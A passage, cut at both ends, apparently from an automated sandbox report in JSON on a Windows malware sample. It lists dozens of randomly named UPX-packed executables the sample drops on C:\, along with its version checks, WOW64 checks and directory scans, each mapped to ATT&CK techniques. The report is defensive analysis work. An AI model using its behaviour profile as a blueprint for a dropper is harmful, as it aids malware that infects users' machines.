compressed\"- Location: [C:\\rtdhhn.exe]- [targetUID: 00000000-00002056]\n \"rjtxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjtxj.exe]- [targetUID: 00000000-00001356]\n \"60024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60024.exe]- [targetUID: 00000000-00001356]\n \"0642260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0642260.exe]- [targetUID: 00000000-00001348]\n \"8402600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402600.exe]- [targetUID: 00000000-00001348]\n \"tfftdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfftdr.exe]- [targetUID: 00000000-00002736]\n \"tjbljn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjbljn.exe]- [targetUID: 00000000-00002736]\n \"xdnld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdnld.exe]- [targetUID: 00000000-00002680]\n \"vfdlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfdlx.exe]- [targetUID: 00000000-00003968]\n \"rjlbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjlbb.exe]- [targetUID: 00000000-00003968]\n \"ftnpjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftnpjx.exe]- [targetUID: 00000000-00001344]\n \"rhpxblx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhpxblx.exe]- [targetUID: 00000000-00003736]\n \"pbdvnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbdvnt.exe]- [targetUID: 00000000-00003736]\n \"bpjjvll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bpjjvll.exe]- [targetUID: 00000000-00003916]\n \"tjphthx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjphthx.exe]- [targetUID: 00000000-00001328]\n \"fdtfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdtfnb.exe]- [targetUID: 00000000-00000720]\n \"lbvfrdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbvfrdl.exe]- [targetUID: 00000000-00000720]\n \"nhffd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhffd.exe]- [targetUID: 00000000-00000664]\n \"ltnlpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltnlpd.exe]- [targetUID: 00000000-00000468]\n \"rhnlvvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnlvvj.exe]- [targetUID: 00000000-00000468]\n \"ptppdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptppdf.exe]- [targetUID: 00000000-00000688]\n \"jvvxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvvxj.exe]- [targetUID: 00000000-00000688]\n \"bdfnxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdfnxb.exe]- [targetUID: 00000000-00003688]\n \"6040224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6040224.exe]- [targetUID: 00000000-00003688]\n \"04048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04048.exe]- [targetUID: 00000000-00003692]\n \"66608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66608.exe]- [targetUID: 00000000-00003268]\n \"680284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\680284.exe]- [targetUID: 00000000-00003880]\n \"24640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24640.exe]- [targetUID: 00000000-00001372]\n \"204084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\204084.exe]- [targetUID: 00000000-00003280]\n \"240286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240286.exe]- [targetUID: 00000000-00003280]\n \"dltbld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dltbld.exe]- [targetUID: 00000000-00003188]\n \"dhnnvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhnnvp.exe]- [targetUID: 00000000-00001500]\n \"dpdlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpdlf.exe]- [targetUID: 00000000-00002744]\n \"48628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48628.exe]- [targetUID: 00000000-00002744]\n \"4066668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4066668.exe]- [targetUID: 00000000-00001896]\n \"00022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00022.exe]- [targetUID: 00000000-00003336]\n \"0204422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0204422.exe]- [targetUID: 00000000-00003172]\n \"rjffft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjffft.exe]- [targetUID: 00000000-00003992]\n \"rpdjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpdjn.exe]- [targetUID: 00000000-00003252]\n \"hfbbnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfbbnn.exe]- [targetUID: 00000000-00003308]\n \"phxdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phxdv.exe]- [targetUID: 00000000-00003308]\n \"rdflttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdflttb.exe]- [targetUID: 00000000-00003712]\n \"vnbvdx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnbvdx.exe]- [targetUID: 00000000-00003712]\n \"vlvdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vlvdf.exe]- [targetUID: 00000000-00000580]\n \"lvnptpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvnptpp.exe]- [targetUID: 00000000-00000580]\n \"04040.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04040.exe]- [targetUID: 00000000-00004252]\n \"6666266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6666266.exe]- [targetUID: 00000000-00002912]\n \"00666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00666.exe]- [targetUID: 00000000-00002404]\n \"hxfhrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxfhrx.exe]- [targetUID: 00000000-00002404]\n \"jdjdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdjdt.exe]- [targetUID: 00000000-00004372]\n \"nthpjvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nthpjvt.exe]- [targetUID: 00000000-00004184]\n \"xjhvjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjhvjn.exe]- [targetUID: 00000000-00004184]\n \"ddvtj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ddvtj.exe]- [targetUID: 00000000-00006072]\n \"pftnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pftnv.exe]- [targetUID: 00000000-00001208]\n \"xpvvjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpvvjv.exe]- [targetUID: 00000000-00002412]\n \"pfflf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfflf.exe]- [targetUID: 00000000-00006000]\n \"hxtnlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxtnlx.exe]- [targetUID: 00000000-00006000]\n \"hthbft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hthbft.exe]- [targetUID: 00000000-00004304]\n \"nhftnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhftnd.exe]- [targetUID: 00000000-00005976]\n \"hvjtfdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvjtfdj.exe]- [targetUID: 00000000-00005976]\n \"82466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82466.exe]- [targetUID: 00000000-00005636]\n \"420260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\420260.exe]- [targetUID: 00000000-00005636]\n \"466844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466844.exe]- [targetUID: 00000000-00006128]\n \"80824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80824.exe]- [targetUID: 00000000-00006116]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"IsWow64Process\" with parameter \"6116\" - (UID: 00000000-00006116)\n \"80824.exe\" called \"IsWow64Process\" with parameter \"6128\" - (UID: 00000000-00006128)\n \"466844.exe\" called \"IsWow64Process\" with parameter \"5872\" - (UID: 00000000-00005872)\n \"82466.exe\" called \"IsWow64Process\" with parameter \"4108\" - (UID: 00000000-00004108)\n \"nhftnd.exe\" called \"IsWow64Process\" with parameter \"5988\" - (UID: 00000000-00005988)\n \"hxtnlx.exe\" called \"IsWow64Process\" with parameter \"6000\" - (UID: 00000000-00006000)\n \"xpvvjv.exe\" called \"IsWow64Process\" with parameter \"1208\" - (UID: 00000000-00001208)\n \"pftnv.exe\" called \"IsWow64Process\" with parameter \"4232\" - (UID: 00000000-00004232)\n \"xjhvjn.exe\" called \"IsWow64Process\" with parameter \"4184\" - (UID: 00000000-00004184)\n \"nthpjvt.exe\" called \"IsWow64Process\" with parameter \"4372\" - (UID: 00000000-00004372)\n \"jdjdt.exe\" called \"IsWow64Process\" with parameter \"4388\" - (UID: 00000000-00004388)\n \"00666.exe\" called \"IsWow64Process\" with parameter \"2912\" - (UID: 00000000-00002912)\n \"lvnptpp.exe\" called \"IsWow64Process\" with parameter \"580\" - (UID: 00000000-00000580)\n \"vnbvdx.exe\" called \"IsWow64Process\" with parameter \"3712\" - (UID: 00000000-00003712)\n \"rdflttb.exe\" called \"IsWow64Process\" with parameter \"3212\" - (UID: 00000000-00003212)\n \"rjffft.exe\" called \"IsWow64Process\" with parameter \"3992\" - (UID: 00000000-00003992)\n \"4066668.exe\" called \"IsWow64Process\" with parameter \"1896\" - (UID: 00000000-00001896)\n \"48628.exe\" called \"IsWow64Process\" with parameter \"2744\" - (UID: 00000000-00002744)\n \"dpdlf.exe\" called \"IsWow64Process\" with parameter \"1500\" - (UID: 00000000-00001500)\n \"dltbld.exe\" called \"IsWow64Process\" with parameter \"5808\" - (UID: 00000000-00005808)\n \"24640.exe\" called \"IsWow64Process\" with parameter \"3880\" - (UID: 00000000-00003880)\n \"680284.exe\" called \"IsWow64Process\" with parameter \"3520\" - (UID: 00000000-00003520)\n \"ptppdf.exe\" called \"IsWow64Process\" with parameter \"1924\" - (UID: 00000000-00001924)\n \"rhnlvvj.exe\" called \"IsWow64Process\" with parameter \"468\" - (UID: 00000000-00000468)\n \"ltnlpd.exe\" called \"IsWow64Process\" with parameter \"3472\" - (UID: 00000000-00003472)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00e8c02f00e3c02f00000000000000000000002800000000011ce312000000000080f0120095e10877b9261700feffffff435c0c7750590c77aa000000b8000000e2c02f00e0c02f00a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000028001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c770ac12f00a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce2740ac12f00a06ae274a06ae27414e9120002020000 (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006116)\n \"80824.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"80824.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004800484b4800434b4800000000000000000000001c0000000001ecdf12000000000050ed120095e10877032b1700feffffff435c0c7750590c77aa000000b8000000424b4800404b480074e11200ace512000000000000000000000000000000000000000000000000008025000000001c001c5c0b7760d80075ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed0c776a4b4800a06ae2748600000074e11200ace512000000000086008800a06ae27474e11200916ce2746a4b4800a06ae274a06ae274e4e5120002020000 (UID: 00000000-00006128)\n \"80824.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"466844.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"466844.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002200a82e2200a32e2200000000000000000000001a00000000011ce312000000000080f0120095e10877a2281700feffffff435c0c7750590c77aa000000b8000000a22e2200a02e2200a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001a001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c77ca2e2200a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce274ca2e2200a06ae274a06ae27414e9120002020000 (UID: 00000000-00005872)\n \"466844.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"420260.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003500303235002b323500000000000000000000002d00000000011ce312000000000080f0120095e10877542e1700feffffff435c0c7750590c77aa000000b80000002a32350028323500a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c7752323500a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce27452323500a06ae274a06ae27414e9120002020000 (UID: 00000000-00005636)\n \"420260.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005636)\n \"82466.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004108)\n \"82466.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b00184f2b00134f2b0000000000000000000000280000000001ecdf12000000000050ed120095e108774d2d1700feffffff435c0c7750590c77aa000000b8000000124f2b00104f2b0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed0c773a4f2b00a06ae2748600000074e11200ace512000000000086008800a06ae27474e11200916ce2743a4f2b00a06ae274a06ae274e4e5120002020000 (UID: 00000000-00004108)\n \"82466.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004108)\n \"hvjtfdj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d0010392d000b392d00000000000000000000002500000000011ce312000000000080f0120095e10877e9571700feffffff435c0c7750590c77aa000000b80000000a392d0008392d00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c7732392d00a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce27432392d00a06ae274a06ae27414e9120002020000 (UID: 00000000-00005976)\n \"hvjtfdj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"nhftnd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)\n \"nhftnd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700c8b36700c3b36700000000000000000000006000000000011ce312000000000080f0120095e10877e2561700feffffff435c0c7750590c77aa000000b8000000c2b36700c0b36700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c77eab36700a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce274eab36700a06ae274a06ae27414e9120002020000 (UID: 00000000-00005988)\n \"nhftnd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)\n \"hthbft.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00e82e1c00e32e1c0000000000000000000000190000000001ecdf12000000000050ed120095e10877b9581700feffffff435c0c7750590c77aa000000b8000000e22e1c00e02e1c0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed0c770a2f1c00a06ae2748600000074e11200ace512000000000086008800a06ae27474e11200916ce2740a2f1c00a06ae274a06ae274e4e5120002020000 (UID: 00000000-00004304)\n \"hthbft.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004304)\n \"hxtnlx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006000)\n \"hxtnlx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000024004833240043332400000000000000000000001c00000000011ce312000000000080f0120095e108775b5e1700feffffff435c0c7750590c77aa000000b80000004233240040332400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001c001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c776a332400a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce2746a332400a06ae274a06ae27414e9120002020000 (UID: 00000000-00006000)\n \"hxtnlx.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006000)\n \"pfflf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0050352a004b352a00000000000000000000002200000000011ce312000000000080f0120095e108773b5c1700feffffff435c0c7750590c77aa000000b80000004a352a0048352a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c0b7760d80075ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed0c7772352a00a06ae27486000000a4e41200dce812000000000086008800a06ae274a4e41200916ce27472352a00a06ae274a06ae27414e9120002020000 (UID: 00000000-00002412)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter 80824.exe (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006116)\n 